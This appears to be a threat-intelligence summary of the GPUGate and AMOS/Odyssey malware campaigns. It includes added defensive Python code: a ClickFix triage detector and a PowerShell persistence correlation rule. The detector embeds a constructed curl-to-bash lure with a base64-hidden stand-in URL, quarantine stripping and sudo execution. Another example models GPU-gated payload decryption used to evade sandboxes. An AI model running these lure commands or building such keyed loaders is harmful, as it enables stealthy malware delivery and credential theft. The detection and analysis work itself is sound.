GPUGate Malware Campaign Targets IT Firms in Western Europe
Summary
GPUGate is a malware campaign aimed at IT and software development companies in Western Europe that has since been extended to macOS users. Activity attributed to it dates back to December 2024. The delivery chain abuses Google Ads, SEO poisoning and fake GitHub commits to steer victims to look-alike download pages. On Windows the lure is a 128 MB Microsoft Software Installer (MSI) whose unusual size helps it evade detection; its loader only decrypts the next stage when a real GPU is present ("GPU-gated" decryption), so sandboxes and virtual machines without one never see the payload. A Visual Basic Script then launches a PowerShell script with administrator privileges that adds Microsoft Defender exclusions, creates scheduled tasks for persistence and runs executables from a downloaded ZIP archive. The end goal is information theft and delivery of secondary payloads. The operators show native Russian language proficiency and work cross-platform.

The macOS arm of the campaign uses fake GitHub repositories and fake download sites for Homebrew, LogMeIn and TradingView, pushed to the top of search results by SEO poisoning and Google Ads, to deliver the Atomic macOS Stealer (AMOS) and the related Odyssey Stealer. Victims are given ClickFix-style instructions to paste a curl command into Terminal; the command fetches a base64-encoded URL and runs an install script that downloads the payload, strips its quarantine attribute to avoid Gatekeeper prompts and executes it. The operators create the fake pages from multiple GitHub accounts so that individual takedowns do not stop the campaign; one batch of pages, created on September 16, 2025, was submitted for takedown as soon as it was found. More than 100 software brands are impersonated, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird and SentinelOne, and LastPass is among the companies whose products were spoofed. AMOS, sold as malware-as-a-service for $1,000 a month, has been in circulation since at least April 2023 and now includes a backdoor component for persistent, stealthy access; similar campaigns using malicious Google Ads and public GitHub repositories were observed in July 2025.
Timeline
-
18.10.2025 18:02 · 1 article
New malware payloads AMOS and Odyssey target macOS developers
The campaign targets macOS developers with fake Homebrew, LogMeIn and TradingView download sites, advertised through Google Ads and promoted in Google Search results. The sites present convincing download portals and use 'ClickFix' instructions: the visitor is told to paste a curl command into Terminal to install the app. That command fetches and decodes an 'install.sh' script, which downloads the payload binary, strips its quarantine attribute so that Gatekeeper never prompts, and runs it. The payload is either AMOS or Odyssey; it first checks whether it is running in a virtual machine or an analysis environment, then invokes sudo to run commands as root and collects detailed hardware and memory information about the host. It tampers with system services (for example, killing OneDrive updater daemons) and talks to macOS XPC services so that its activity blends in with legitimate processes. Finally it harvests data stored in browsers and cryptocurrency wallet credentials and exfiltrates them to the command-and-control (C2) server.
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
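The ClickFix chain above comes down to a handful of observable behaviours in a single pasted command and in the script it fetches: a base64-wrapped URL, a download piped into a shell, removal of the quarantine attribute, and a sudo elevation. The triage helper below, an added example that is not code from the reporting vendors or from the campaign, decodes the hidden URL and scores those behaviours. The pasted command, the install script and the hostname example.invalid are constructed for illustration; no real indicator is used.

```python
"""Triage a ClickFix-style macOS install command and the script it fetches.

Added example; the samples and the hostname example.invalid are constructed.
"""
import base64
import binascii
import re

# Constructed lure URL (not a real indicator), hidden inside base64 as the
# reporting describes.
_LURE_URL = "https://example.invalid/install.sh"
_ENCODED_URL = base64.b64encode(_LURE_URL.encode()).decode()

# Constructed: what the lure page tells the victim to paste into Terminal.
SAMPLE_PASTED_COMMAND = f'curl -fsSL "$(echo {_ENCODED_URL} | base64 -d)" | bash'

# Constructed: what the fetched install.sh does, following the reported chain:
# download a binary, strip the quarantine attribute so Gatekeeper never
# prompts, then run it as root.
SAMPLE_INSTALL_SH = """\
curl -fsSL https://example.invalid/update -o /tmp/.update
xattr -d com.apple.quarantine /tmp/.update
chmod +x /tmp/.update
sudo /tmp/.update
"""

# The legitimate Homebrew one-liner, for comparison: it also fetches a script.
HOMEBREW_INSTALL = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

# Candidate base64 tokens: long runs of the base64 alphabet, optional padding.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# One check per behaviour in the reported chain. None is malicious on its own.
CHECKS = {
    "pipes_to_shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "shell_runs_fetched_script": re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*curl\b"),
    "decodes_base64": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "strips_quarantine": re.compile(r"\bxattr\b.*?(?:\s-c\b|com\.apple\.quarantine)"),
    "elevates_with_sudo": re.compile(r"\bsudo\b"),
    "downloads_with_curl": re.compile(r"\bcurl\b"),
    "writes_hidden_tmp_file": re.compile(r"-o\s+/tmp/\."),
}


def decode_base64_tokens(text):
    """Return the printable ASCII strings hidden in base64 tokens of text."""
    found = []
    for token in _B64_TOKEN.findall(text):
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError):
            continue  # not valid base64, or not text: skip it
        if decoded and decoded.isprintable():
            found.append(decoded)
    return found


def triage(text):
    """Score a command or script and surface any URL it tries to hide."""
    hits = {name: bool(rx.search(text)) for name, rx in CHECKS.items()}
    decoded = decode_base64_tokens(text)
    urls = [s for s in decoded if s.startswith(("http://", "https://"))]
    score = sum(hits.values()) + (2 if urls else 0)  # a hidden URL counts double
    if score >= 3:
        verdict = "suspicious"
    elif score > 0:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "score": score, "hits": hits,
            "decoded": decoded, "urls": urls}


if __name__ == "__main__":
    for label, sample in [("pasted command", SAMPLE_PASTED_COMMAND),
                          ("install.sh", SAMPLE_INSTALL_SH),
                          ("homebrew (legit)", HOMEBREW_INSTALL)]:
        result = triage(sample)
        print(f"{label}: {result['verdict']} (score {result['score']}) urls={result['urls']}")
```

The same regexes can be run over shell-history files or EDR process-creation events for zsh, bash and sh. Note that the genuine Homebrew installer scores "review", not "clean": fetching a script with curl is normal developer behaviour, and what separates the lure from it is the combination of base64 obfuscation, quarantine removal and root execution, not any single step.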
-
22.09.2025 22:44 · 1 article
Threat actors view Mac users as low-hanging fruit
The threat actors may view Mac users as low-hanging fruit because of the perception that Macs face fewer malware threats. The Atomic infostealer they deliver has been in circulation since at least April 2023, and similar campaigns were observed in July 2025.
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
22.09.2025 18:36 · 1 article
AMOS malware adds backdoor for persistent access
The Atomic (AMOS) malware now includes a backdoor component, giving attackers persistent, stealthy access to compromised systems. AMOS is sold as malware-as-a-service for $1,000 a month.
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
-
20.09.2025 10:07 · 3 articles
GPUGate campaign expands to macOS users through fake GitHub repositories
The fake GitHub pages were created on September 16, 2025, and were submitted for takedown as soon as they were found. SEO poisoning keeps the fake repositories high in search results. The lures now also include fake Homebrew, LogMeIn and TradingView sites aimed at macOS developers. The Atomic infostealer being delivered has been in circulation since at least April 2023; similar campaigns were observed in July 2025.
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
08.09.2025 18:02 · 5 articles
GPUGate Malware Campaign Targets IT Firms in Western Europe
Brands across the technology and financial sectors, including LastPass, have been impersonated. The fake GitHub pages were created on September 16, 2025, and were submitted for takedown as soon as they were found. SEO poisoning keeps the fake repositories high in search results, and the lures now also include fake Homebrew, LogMeIn and TradingView sites aimed at macOS developers. The Atomic infostealer being delivered has been in circulation since at least April 2023; similar campaigns were observed in July 2025.
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
Information Snippets
-
The GPUGate malware campaign targets IT and software development companies in Western Europe.
First reported: 08.09.2025 18:02 · 3 sources, 3 articles
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
The campaign uses Google Ads and fake GitHub commits to deliver malware.
First reported: 08.09.2025 18:02 · 3 sources, 5 articles
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The campaign's activity dates back to December 2024. Its Windows lure is a 128 MB Microsoft Software Installer (MSI); the oversized file helps it evade detection.
First reported: 08.09.2025 18:02 · 1 source, 1 article
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
-
The Windows loader uses GPU-gated decryption: it only decrypts its next stage when a real GPU is present, so sandboxes and virtual machines that lack one never see the payload, which defeats both automated analysis and many detection pipelines.
First reported: 08.09.2025 18:02 · 1 source, 1 article
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
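GPU gating is a form of environmental keying: the loader reads a property of the host that sandboxes usually cannot fake and refuses to proceed, or derives a wrong key, when that property is missing. The model below is an added example, not GPUGate's code, and it makes two assumptions the page does not state: that the gate is a minimum length on the reported GPU device name (empty or very short names being typical of VMs without a real GPU), and that the payload key is derived from that name. A real loader may instead use the GPU only as a presence check before a fixed decryption routine; the structure (gate, derive, verify, run) is the same either way. The device names, the second-stage bytes and the XOR-plus-HMAC construction are constructed stand-ins.

```python
"""Model of GPU-gated payload decryption. Added example, not the loader's code.

Assumptions (not from the page): the gate is a minimum length on the GPU device
name, and the key is derived from that name. The cipher is an illustrative
XOR stream with an HMAC tag so that a wrong key is detected rather than
producing garbage.
"""
import hashlib
import hmac
from itertools import cycle

MIN_GPU_NAME_LEN = 10  # assumption: short/empty names are treated as "no real GPU"
TAG_LEN = 32


def derive_key(gpu_name: str) -> bytes:
    """Environmental key: SHA-256 of the reported GPU device name (illustrative)."""
    return hashlib.sha256(gpu_name.encode("utf-8")).digest()


def _xor_stream(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def seal(plaintext: bytes, gpu_name: str) -> bytes:
    """Build-time side: encrypt the next stage under the key for gpu_name, append a tag."""
    key = derive_key(gpu_name)
    ct = _xor_stream(plaintext, key)
    return ct + hmac.new(key, ct, hashlib.sha256).digest()


def unseal(blob: bytes, gpu_name: str):
    """Runtime side. Returns (status, plaintext_or_None)."""
    if len(gpu_name) < MIN_GPU_NAME_LEN:
        return "no_real_gpu", None  # sandbox/VM: stop before touching the payload
    key = derive_key(gpu_name)
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(hmac.new(key, ct, hashlib.sha256).digest(), tag):
        return "wrong_key", None  # plausible GPU, but not the one the blob was keyed to
    return "ok", _xor_stream(ct, key)


# Constructed placeholders: the "second stage" and the device name the blob targets.
SAMPLE_STAGE2 = b"echo constructed-second-stage"
TARGET_GPU = "NVIDIA GeForce RTX 4070"

# Constructed device names an analyst might see: none, a software rasterizer,
# the targeted card, and a different real card.
CANDIDATE_NAMES = ["", "llvmpipe", TARGET_GPU, "AMD Radeon RX 7800 XT"]


def demo() -> dict:
    """Seal once, then show what each environment gets back."""
    blob = seal(SAMPLE_STAGE2, TARGET_GPU)
    return {name: unseal(blob, name)[0] for name in CANDIDATE_NAMES}


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name!r:28} -> {status}")
```

The practical consequence for analysts is that a sample like this has to be detonated on hardware that exposes a realistic GPU (bare metal with a discrete card, or a VM with GPU passthrough), or with the device-name query patched to return what the loader expects; an ordinary sandbox reports nothing and the payload stays encrypted.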
-
The malware includes a Visual Basic Script that launches a PowerShell script with administrator privileges.
First reported: 08.09.2025 18:02 · 1 source, 1 article
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
-
The PowerShell script adds Microsoft Defender exclusions, sets up scheduled tasks for persistence, and runs executable files from a downloaded ZIP archive.
First reported: 08.09.2025 18:02 · 1 source, 1 article
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
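The two snippets above describe a short, ordered sequence inside one elevated PowerShell process: add a Defender exclusion, unpack an archive, register a scheduled task, run what was dropped. Each step is something an administrator might also do, so the useful detection is the sequence within one process and a short window, not any single command. The correlation below is an added example, not a vendor rule; the events are constructed to look like PowerShell script block log records (Event ID 4104) as an EDR or SIEM would expose them, and the hostnames, paths and task name are assumptions.

```python
"""Correlate Defender-exclusion + scheduled-task activity within one process.

Added example. EVENTS is constructed to resemble PowerShell script block
logging (Event ID 4104) records; hostnames, paths and the task name are
assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, host, process id, script text). Constructed.
EVENTS = [
    ("2025-09-08T10:00:01", "ws-dev-07", 4412,
     "Add-MpPreference -ExclusionPath 'C:\\ProgramData\\Updater'"),
    ("2025-09-08T10:00:02", "ws-dev-07", 4412,
     "Expand-Archive -Path $env:TEMP\\pkg.zip -DestinationPath C:\\ProgramData\\Updater"),
    ("2025-09-08T10:00:05", "ws-dev-07", 4412,
     "Register-ScheduledTask -TaskName 'UpdaterSvc' "
     "-Action (New-ScheduledTaskAction -Execute 'C:\\ProgramData\\Updater\\svc.exe') "
     "-Trigger (New-ScheduledTaskTrigger -AtLogOn)"),
    ("2025-09-08T10:00:06", "ws-dev-07", 4412,
     "Start-Process 'C:\\ProgramData\\Updater\\svc.exe'"),
    # Admin adding a build-folder exclusion with no follow-on: must not alert.
    ("2025-09-08T11:30:00", "ws-admin-01", 9001,
     "Add-MpPreference -ExclusionPath 'D:\\Builds'"),
    # Unrelated task enumeration on the same host, different process.
    ("2025-09-08T12:00:00", "ws-dev-07", 5120,
     "Get-ScheduledTask | Where-Object State -eq 'Ready'"),
]

# One regex per stage of the reported chain.
STAGES = {
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I),
    "archive_extract": re.compile(r"Expand-Archive\b", re.I),
    "scheduled_task": re.compile(
        r"Register-ScheduledTask\b|schtasks(?:\.exe)?\s+/create", re.I),
    "exec_from_dropped": re.compile(r"Start-Process\b", re.I),
}
WINDOW = timedelta(minutes=10)


def correlate(events, window=WINDOW):
    """Alert on a process that adds a Defender exclusion and registers a
    scheduled task within `window`; other stages are reported when present."""
    by_proc = defaultdict(list)
    for ts, host, pid, text in events:
        by_proc[(host, pid)].append((datetime.fromisoformat(ts), text))

    alerts = []
    for (host, pid), rows in by_proc.items():
        rows.sort()
        first_seen = {}  # stage -> first timestamp in this process
        for ts, text in rows:
            for stage, rx in STAGES.items():
                if stage not in first_seen and rx.search(text):
                    first_seen[stage] = ts
        if "defender_exclusion" in first_seen and "scheduled_task" in first_seen:
            gap = first_seen["scheduled_task"] - first_seen["defender_exclusion"]
            if timedelta(0) <= gap <= window:
                alerts.append({
                    "host": host,
                    "pid": pid,
                    "stages": sorted(first_seen, key=first_seen.get),
                    "span_seconds": int(gap.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

Add-MpPreference only succeeds in an elevated session, which is why the chain starts from a VBS that launches PowerShell as administrator; the same exclusion change also surfaces as a Defender configuration-change record (Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log), which can corroborate the script block event when logging is incomplete.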
-
The end goal is information theft and delivery of secondary payloads.
First reported: 08.09.2025 18:02 · 1 source, 1 article
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
-
The threat actors have native Russian language proficiency and use a cross-platform approach, including Atomic macOS Stealer (AMOS).
First reported: 08.09.2025 18:02 · 2 sources, 3 articles
- GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms — thehackernews.com — 08.09.2025 18:02
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
-
The campaign targets macOS users through fake GitHub repositories.
First reported: 20.09.2025 10:07 · 3 sources, 4 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The fake repositories impersonate popular tools like 1Password, Basecamp, Dropbox, and others.
First reported: 20.09.2025 10:07 · 3 sources, 4 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The attacks use SEO poisoning to push malicious links to the top of search results.
First reported: 20.09.2025 10:07 · 3 sources, 4 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The fake GitHub pages are created from multiple GitHub accounts so that taking down one account does not stop the campaign.
First reported: 20.09.2025 10:07 · 3 sources, 4 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The malware is deployed via ClickFix-style instructions executed in the Terminal app.
First reported: 20.09.2025 10:07 · 3 sources, 4 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
Similar campaigns have used malicious sponsored Google Ads for Homebrew to distribute malware.
First reported: 20.09.2025 10:07 · 3 sources, 3 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
Threat actors have been using public GitHub repositories to host and distribute malicious payloads.
First reported: 20.09.2025 10:07 · 3 sources, 3 articles
- LastPass Warns of Fake Repositories Infecting macOS with Atomic Infostealer — thehackernews.com — 20.09.2025 10:07
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
The Atomic (AMOS) malware is a malware-as-a-service operation available for $1,000/month.
First reported: 22.09.2025 18:36 · 2 sources, 3 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems.
First reported: 22.09.2025 18:36 · 2 sources, 3 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne.
First reported: 22.09.2025 18:36 · 1 source, 2 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The fake repositories use a 'download button' that directs visitors to a secondary site for installation commands.
First reported: 22.09.2025 18:36 · 1 source, 2 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The installation command decodes a base64-encoded URL and uses curl to fetch the AMOS payload from it.
First reported: 22.09.2025 18:36 · 1 source, 2 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The campaign continues to evade takedowns by creating new repositories from multiple accounts.
First reported: 22.09.2025 18:36 · 2 sources, 3 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
Users are advised to be cautious of running commands they do not understand and to trust official vendor websites for software downloads.
First reported: 22.09.2025 18:36 · 1 source, 2 articles
- LastPass: Fake password managers infect Mac users with malware — www.bleepingcomputer.com — 22.09.2025 18:36
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
Brands across the technology and financial sectors, including LastPass, have been impersonated by the campaign.
First reported: 22.09.2025 22:44 · 1 source, 1 article
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown.
First reported: 22.09.2025 22:44 · 1 source, 1 article
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results.
First reported: 22.09.2025 22:44 · 1 source, 1 article
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
-
Earlier campaigns using the same tactics were observed in July 2025.
First reported: 22.09.2025 22:44 · 2 sources, 2 articles
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The threat actors may view Mac users as a low-hanging fruit due to the perception that Macs face fewer malware threats.
First reported: 22.09.2025 22:44 · 2 sources, 2 articles
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The Atomic infostealer has been active since at least April 2023.
First reported: 22.09.2025 22:44 · 2 sources, 2 articles
- Attackers Use Phony GitHub Pages to Deliver Mac Malware — www.darkreading.com — 22.09.2025 22:44
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The campaign targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The campaign employs 'ClickFix' techniques to trick targets into executing commands in Terminal.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The campaign uses Google Ads to drive traffic to malicious sites and promote them in Google Search results.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The malicious sites present convincing download portals for the fake apps and instruct visitors to paste a curl command into Terminal to install them.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The command fetches and decodes an 'install.sh' script, which downloads the payload binary, strips its quarantine attribute so that Gatekeeper does not prompt, and runs it.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The payload is either AMOS or Odyssey; before running its main routine it checks whether it is inside a virtual machine or an analysis environment.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The malware invokes sudo to run commands as root and collects detailed hardware and memory information of the host.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The malware tampers with system services, for example by killing OneDrive updater daemons, and interacts with macOS XPC services so that its activity blends in with legitimate processes.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
The malware harvests data stored in browsers and cryptocurrency wallet credentials and exfiltrates them to the command-and-control (C2) server.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
Odyssey Stealer is a relatively new family derived from the Poseidon Stealer, which itself was forked from AMOS.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
-
Odyssey Stealer targets credentials and cookies stored in Chrome, Firefox, and Safari browsers, over a hundred cryptocurrency wallet extensions, Keychain data, and personal files.
First reported: 18.10.2025 18:02 · 1 source, 1 article
- Google ads for fake Homebrew, LogMeIn sites push infostealers — www.bleepingcomputer.com — 18.10.2025 18:02
Similar Happenings
CAPI Backdoor Targets Russian Auto and E-Commerce Firms via .NET Malware
A new campaign targeting the Russian automobile and e-commerce sectors uses a previously undocumented .NET malware, CAPI Backdoor. The attack chain involves phishing emails with ZIP archives containing a decoy document and a malicious Windows shortcut file. The malware, disguised as 'adobe.dll', uses legitimate Microsoft binaries to execute and establish persistence. It can steal data from browsers, take screenshots, and exfiltrate information. The campaign includes a domain impersonating a legitimate Russian automotive site.
GXC Team CaaS Platform Dismantled in Spain
Spanish authorities have dismantled the GXC Team, a crime-as-a-service (CaaS) operation that emerged in 2023 offering AI-powered phishing kits, an SMS-stealing Android trojan and tools for AI-supported voice scams, aimed at banks, transport and e-commerce entities in multiple countries. The leader, a 25-year-old Brazilian known as "GoogleXcoder", lived as a digital nomad, moving between homes in several Spanish provinces, and was arrested in San Vicente de la Barquera, Cantabria, after a year-long investigation that involved six coordinated raids across Spain. The raids, spanning seven Spanish regions, seized electronic devices and cryptocurrency. Police identified six other individuals allegedly associated with the operation; the group's Telegram channels were deactivated, and the seized digital evidence is being examined to identify further suspects, so more arrests are possible.
ClayRat Spyware Campaign Targets Android Users in Russia
A rapidly evolving Android spyware campaign known as ClayRat continues to target Russian users through Telegram channels and phishing websites. The spyware disguises itself as trusted apps such as WhatsApp, TikTok, Google Photos, and YouTube to trick users into downloading malicious software. Over the past three months, researchers identified more than 600 distinct ClayRat samples and 50 droppers, each version introducing new obfuscation layers to evade security tools. Once installed, the spyware can exfiltrate call logs, SMS messages, and notifications, take photos using the front camera, and send messages or place calls directly from the victim’s phone. The spyware’s operators employ a multifaceted strategy combining impersonation, deception, and automation. Distribution occurs mainly through phishing sites, Telegram channels, step-by-step installation guides, and session-based installers posing as Play Store updates. ClayRat’s most concerning feature is its abuse of Android's default SMS handler role, allowing it to read, store, and send text messages without alerting users. This access is exploited to spread itself further, sending messages to every saved contact. Zimperium's systems detected ClayRat variants as soon as they appeared, before public disclosures. The company shared its findings with Google, helping ensure protection through Google Play Protect. Security experts recommend a layered mobile security posture to reduce installation paths, detect compromise, and limit the blast radius. Users should only install applications from authorized Play/App stores.
WordPress Sites Exploited for ClickFix Phishing Attacks
